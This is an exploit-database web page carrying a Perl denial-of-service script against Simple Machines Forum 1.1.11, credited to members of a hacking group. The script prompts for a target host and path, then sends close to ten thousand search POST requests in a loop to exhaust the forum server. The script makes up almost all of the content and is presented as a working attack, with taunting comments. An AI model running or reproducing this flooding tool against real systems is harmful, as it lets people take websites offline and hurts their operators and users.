|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Ashiyane Digital Security Team Added by : Cair3x SecurityRisk : Low  (About) Remote : Yes Local : No Status : Trick
Text : ###################################### [+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS [+] Date: 2010-02-11 [+] Author: Ashiyane Digital Security Members (Cair3x) [+] Software Link: http://www.simplemachines.org/ [+] Version: 1.1.11 And All Version [+] Tested on: All ###################################### #!/usr/bin/perl use IO::Socket; print q{ ################################################## # He Smf Full Ver ha ha ha Multiple Search DOS # # Tested on SMF 1.1.11 - 1.1.11 # # Created By Cair3x ! ;) # ################################################## [ Script ] }; $rand=rand(10); print "Forum Host: "; $serv = <stdin>; chop ($serv); print "Forum Path: "; $path = <stdin>; chop ($path); for ($i=0; $i<9999; $i++) { $postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_tim e =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=A S C&show_results=posts&return_chars=200"; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$serv", PeerPort => "80", Proto => "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; print $sock "POST $path"."index.php?action=search2 HTTP/1.1\n"; print $sock "Host: $serv\n"; print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $serv\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; } print "Forum Be Fuke Raft. Test Konid ...\n"; [ / Script ] ###################################### BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ashiyane.org Forum : Http://Ashiyane.org/forums/ [+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Frinds) ###################################### Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowaIf you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |